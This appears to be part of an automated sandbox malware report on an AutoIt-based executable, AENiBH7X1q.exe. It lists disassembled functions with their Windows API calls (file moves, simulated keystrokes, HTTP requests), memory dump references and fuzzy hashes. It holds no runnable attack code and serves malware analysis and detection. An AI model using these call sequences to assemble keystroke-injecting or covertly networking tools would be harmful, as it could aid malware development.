                                                                                                                                                                                                                                                                                                                                                                                                                Function 00456168 Relevance: 13.7, APIs: 9, Instructions: 181COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 20732dcab93056f759d0b04a6df1a57780e33876730225f1fefd21ccf2a16f59
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36519070200301ABD320DF29CC85F5BB7E8EB48715F540A1EF995E7292D7B4E949CB29
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004534EB Relevance: 13.6, APIs: 9, Instructions: 150filestringCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\AENiBH7X1q.exe,?,C:\Users\user\Desktop\AENiBH7X1q.exe,004A8E80,C:\Users\user\Desktop\AENiBH7X1q.exe,0040F3D2), ref: 0040FFCA
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                                                                                                                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 0045355E
                                                                                                                                                                                                                                                                                                                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 0045358E
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 978794511-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: dcad70f49e32ae1adaf0c812d378eb0bba467e0a617048934f4a65f03e3a0b24
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 665162B25043406AC724EF61D885ADFB3E8AFC8305F44992EB94992151E73DD34DC767
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004417BC Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b1e2397247e50d0c7000acf5a2db8631a214b417b603bec0598d849dd48054e0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E54128332402806BE320A75DB8C4ABBFB98E7A2362F50443FF18196520D76678C5D339
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00445CF9 Relevance: 13.6, APIs: 9, Instructions: 69sleepkeyboardwindowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044593E: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 0044595D
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044593E: GetCurrentThreadId.KERNEL32 ref: 00445964
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044593E: AttachThreadInput.USER32(00000000,?,00000001,00478FA7), ref: 0044596B
                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D15
                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00445D35
                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00445D3F
                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D45
                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(00000000,00000100,00000027,00000000), ref: 00445D66
                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000), ref: 00445D70
                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D76
                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00445D8B
                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00445D8F
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2014098862-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b085f3065cf9cd100f04f322da00d4b037e108fc79bf5967fdabce1cd6d2e74b
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B116971790704B7F620AB958C8AF5A7399EF88B11F20080DF790AB1C1C9F5E4418B7C
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045427D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 259libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AddressProc_malloc$_strcat_strlen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: AU3_FreeVar
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2184576858-771828931
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 10d9e78008ba5b5703de8dc23ed72c3cd296113dc033390a1be7ca980e1f1503
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c940ad03d776ce5ee908f8b881b33357b51647545ffc53e819ca791e1fdac2da
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 10d9e78008ba5b5703de8dc23ed72c3cd296113dc033390a1be7ca980e1f1503
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EDA18DB5604205DFC300DF59C480A2AB7E5FFC8319F1489AEE9554B362D739ED89CB8A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00401D10 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 235COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D5A
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 0042A751
                                                                                                                                                                                                                                                                                                                                                                                                                • UnregisterHotKey.USER32(?), ref: 0042A778
                                                                                                                                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0042A822
                                                                                                                                                                                                                                                                                                                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0042A854
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: close all
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4174999648-3243417748
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 9f9deb73285226e6ba240568d142da5fec9cf520cd27fc9a3a2cacaca98377aa
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e23b5dd52123a376b0379481fe8be5d2f02d07e70979f80a1c72d587d5a24a2c
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f9deb73285226e6ba240568d142da5fec9cf520cd27fc9a3a2cacaca98377aa
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FFA17075A102248FCB20EF55CC85B9AB3B8BF44304F5044EEE90967291D779AE85CF9D
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044AA1F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 171networkCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AA5A
                                                                                                                                                                                                                                                                                                                                                                                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AA8D
                                                                                                                                                                                                                                                                                                                                                                                                                • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0044AAF9
                                                                                                                                                                                                                                                                                                                                                                                                                • InternetSetOptionW.WININET(00000000,0000001F,?,00000004), ref: 0044AB11
                                                                                                                                                                                                                                                                                                                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB20
                                                                                                                                                                                                                                                                                                                                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,00000000,00000000), ref: 0044AB61
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1291720006-3916222277
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 782b6278bf246bef60821ca34847c3ce69a0d92f774604c9678bedd135ce19ea
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C51E6B12803016BF320EB65CD85FBBB7A8FB89704F00091EF74196181D7B9A548C76A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046BB59 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 168networkCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorLastselect
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: HH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 215497628-2761332787
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 3d89cdb4518712ce7d497f90f16eabf25f5dd16b03f437b50de1b9ff930cdf67
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: a252b81ccbce03d1e7b1b0efababa2c0a0929072778302a7b1202b90a7697d70
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d89cdb4518712ce7d497f90f16eabf25f5dd16b03f437b50de1b9ff930cdf67
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF51E4726043005BD320EB65DC42F9BB399EB94324F044A2EF558E7281EB79E944C7AA
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0047D2F8 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 162COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __snwprintf__wcsicoll_wcscpy
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: , $$0vH$AUTOITCALLVARIABLE%d$CALLARGARRAY
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1729044348-3708979750
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 19d8c814bf70bb05cadf871115a188aa6336bc7b5c41e4e48777219efcb9f973
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 823d0c4529048d9f890bbf28e75db1a658c609af9319d28fcdda535ef0d13f31
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 19d8c814bf70bb05cadf871115a188aa6336bc7b5c41e4e48777219efcb9f973
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E651A571514300ABD610EF65C882ADFB3A4EFC4348F048D2FF54967291D779E949CBAA
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044BBC9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 100filestringCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\AENiBH7X1q.exe,?,C:\Users\user\Desktop\AENiBH7X1q.exe,004A8E80,C:\Users\user\Desktop\AENiBH7X1q.exe,0040F3D2), ref: 0040FFCA
                                                                                                                                                                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 0044BC04
                                                                                                                                                                                                                                                                                                                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 0044BC38
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 0044BCAA
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0044BCB7
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0044BCCB
                                                                                                                                                                                                                                                                                                                                                                                                                • SHFileOperationW.SHELL32 ref: 0044BD16
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: \*.*
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2326526234-1173974218
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 9e4979448571685848097db6772507fbfe8bfb8d1337cd0032b1ea927bdad9db
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B3183B14083019AD724EF21C5D5ADFB3E4EFC8304F444D6EB98993251EB39E608D7AA
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004366BE Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00436328: _wcsncpy.LIBCMT ref: 0043633C
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 004366DD
                                                                                                                                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00436700
